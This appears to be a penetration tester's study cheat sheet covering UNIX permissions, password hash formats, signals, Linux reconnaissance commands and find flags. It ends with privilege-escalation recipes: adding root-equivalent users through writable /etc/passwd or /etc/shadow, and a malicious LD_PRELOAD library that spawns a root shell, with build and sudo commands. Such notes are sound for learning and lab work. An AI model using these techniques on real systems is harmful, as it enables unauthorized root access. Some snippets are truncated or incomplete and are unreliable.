

UNIX permissions

Numeric permissions are sometimes called absolute permissions, because they exactly specify an object’s permissions. Symbolic permissions are a bit more flexible.

Like absolute permissions, symbolic permissions are divided into user (u), group (g), and others (o). Unlike absolute permissions, not all of these permission sets need to be specified. Sets are separated by commas, and identical sets can be combined (e.g., ug).

This specifier is then followed by an operator that specifies whether the following permissions should be granted (+), removed (-), or set exactly (=). (Note that when using “find” only = makes sense.)

UNIX permission representation

*NIX permissions are represented as one or more of the following:

Sticky Bitt1

The SUID/SGID bits are applied to the user or group (respectively) when set symbolically; the sticky bit is applied to the “other” permission set. When set numerically, all three of these values are applied to the “prefix” digit.

Symbolically, the SUID/SGID bits can be represented as either s or S. The different is whether the user/group also has execute permissions (s), or lacks these permissions (S).

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Execute as the file owner, rather than the user passing the command.


If set on a file, this operates similarly to SUID: The file is executed as if the user passing the command was in the group with the SGID bit set. (I honestly have rarely seen this used.)

If set on a directory, files created in the directory will have their group ownership set to the same group as the directory itself. (In my experience this is the more common use case.)

Sticky bit

Only applied to directories. A file in a directory with the sticky bit set can only be deleted by its owner (and root). For example, /tmp always has the sticky bit set.

Write permissions and directories

If a user has write access to a directory, then they can write to any file they have at least read access to (!!!).

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Password hashes

UNIX password hashes

UNIX-style passwords are of the form $format$rounds$salt$hash. Common format parameters:

  • 1 — md5crypt (mostly older)
  • 2, 2a, 2b, 2x, 2y — bcrypt (generally web apps)
  • 6 — sha512crypt (most modern systems)

Both $rounds and $salt are optional (salts are never purely numeric, so it’s easy to tell these apart).

Bcrypt is designed to take approximately the same amount of time when hashed on a CPU vs. a GPU, which is one reason it’s considered more resistant to cracking.


1 hex digit = 4 bits (2 hex digits per byte), which is why a 128-bit md5 hash is 32 characters long.

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File descriptors

UNIX file descriptors

There are three file descriptors that every application has access to:

  • STDIN — 0
  • STDOUT — 1
  • STDERR — 2

Additional file descriptors can also be created in an ad hoc fashion.

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Process signals

POSIX process signals

  • SIGTERM — Kill the process, but allow it to do some cleanup tasks beforehand
  • SIGKILL — Kill the process (doesn’t do any cleanup after the fact)
  • SIGSTOP — Stop/suspend a process

There are others, but these are the big ones.

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Linux reconnaissance

Useful commands

Useful built-in commands for Linux reconnaissance

  • cat /etc/issue
  • cat /etc/passwd
  • cat /proc/version
  • env
  • dpkg -l — list installed packages on Debian derived systems
  • find
  • getcap — find and list executable capabilities
  • history
  • hostname
  • id
  • ifconfig
  • ip route
  • last — display recently logged-in users (including IP addresses for network users)
  • ls
  • lsof -i — list programs using given network ports (use with netstat)
  • netstat -ano — list all listening parts and established connections, no domain resolution
  • netstat -i — list per interface statistics
  • netstat -l — list only listening ports
  • netstat -p — list protocol and service information (requires root to see everything)
  • netstat -s — list protocol statistics
  • ps auxfww — show process tree
  • ps auxww — show lots and lots of process info
  • rpm -qa — list installed packages on Red Hat derived systems
  • sudo -l
  • uname -a
  • w — list all currently logged-in users and their current program
  • who — list all currently logged-in users (including IP addresses for network users)
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Package enumeration

How to match files to packages


How to match files to packages in Debian-based operating systems

# List all installed packages
dpkg-query -l
# List files in an installed package
dpkg-query -L $PACKAGE_NAME
# List the package that owns a particular file
dpkg-query -S $FULL_PATH_TO_FILE
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Red Hat

How to match files to packages in Red Hat-based operating systems

# List all installed packages
rpm -qa
# List files in an installed package
# List the package that owns a particular file
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Finding potentially interesting files

find file metadata flags

Some useful find flags related to file metadata.


Filter files based on ownership in find

The -user and -group flags match files and folders owned by a particular user or group (both numeric and symbolic-readable names are allowed).

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File size

Filter files based on size in find

The -size flag matches files of size n.

Prefix n with + or - to match files strictly greater than or less than n in size. To specify useful sizes, use a suffix.

  • c — Bytes
  • k — Kilobytes
  • M — Megabytes
  • G — Gigabytes

For example, use -size +4G to find files over 4 GB (i.e., those that can’t be written to a FAT32 file system).

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Filter files based on file permissions in find

The -perm flag matches files and folders with a given permission. Both numeric and symbolic permissions are allowed.

Use the / or - prefix to match files with any of the specified permissions or at least the specified permissions. For example, -perm -644 will match any file where the current user has at least read + write access and any other user has at least read access (so, - requires the specified permissions, but is agnostic as to the presence/absence of additional permissions). Likewise, -perm /666 will match files where the current user has read + write access and/or the current group has read + write access and/or everyone has read + write access (so, / requires that at least one of the specified permissions groups matches exactly, but is agnostic to the state of any other group outside of that match).

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Filter files based on timestamp in find

The -Xmin and -Xtime flags match files accessed (a), had their contents modified (m), or had their inode changed (c) n minutes (-Xmin) or days (-Xtime) ago.

All mtime changes are ctime changes, but the reverse is not necessarily true.

Prefix n with + or - to match files strictly before or after the specified time in the past.

For example:

# Matches files accessed *more* than 30 minutes ago
find . -type f -amin +30
# Matches files modified *less* than 7 days ago
find . -type f -mtime -7
# Matches files modified *today*
find . -type f -mtime 0
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Finding SUID “capable” files

How to find executables with SUID capabilities

Executables can also have an SUID “capability” set in Linux, which is not the same as the SUID permission!

The getcap command displays a binary’s capabilities (if there are any), and can even be used to perform a search for such binaries using getcap -r $PATH 2> /dev/null.

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Useful scripts

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Exploiting /etc/passwd

How to exploit weak /etc/passwd permissions

If /etc/passwd has weak permissions, then passwords in it can be replaced (since Linux systems still use the password hashes in /etc/passwd preferentially to those in /etc/shadow). This means that we can just directly add root-equivalent users directly there (remember that the UID and primary GID can be duplicated!).

To generate a password acceptable for inclusion in /etc/passwd:

openssl passwd -1 -salt $SALT $PASSWORD
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Exploiting /etc/shadow

How to exploit weak /etc/shadow permissions

If /etc/shadow has weak permissions, then passwords in it can be replaced. To create a new password, use:

mkpasswd -m sha-512 $PASSWORD
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Exploiting LD_PRELOAD

How to exploit LD_PRELOAD

If LD_PRELOAD is preserved by sudo, then it’s possible to use a malicious dynamic library to gain root access — just run sudo LD_PRELOAD=/path/to/ program-runnable-with-nopasswd. Preserved environment variables are listed by “sudo -l”.

A simple malicious library (perhaps the simplest) that can exploit the LD_PRELOAD trick is:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
	system("/bin/bash -p");

Compile with:

gcc -fPIC -shared -nostartfiles \
    -o /path/to/ /path/to/malicious.c
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How to exploit LD_LIBRARY_PATH

If LD_LIBRARY_PATH is preserved by sudo, then it’s possible to use a malicious dynamic library to gain root access. Preserved environment variables are listed by “sudo -l”.

Use ldd to see what libraries a program is already pulling in, and then name your malicious library after one of these. Then run sudo LD_LIBRARY_PATH=/path/to/malicious/library program-runnable-with-nopasswd to trick the program into loading your malicious library instead of the legitimate system library.

While the same code as LD_PRELOAD can be used as a starting point for an LD_LIBRARY_PATH exploit, things get trickier because some libraries are required by others, loaded at different times, or have functions (symbols) that are loaded but not used right away. So some amount of trial-and-error, both in the naming of the malicious library and in what functions are defined within it, may be required.

Not every UNIX-like system calls their library path LD_LIBRARY_PATH!

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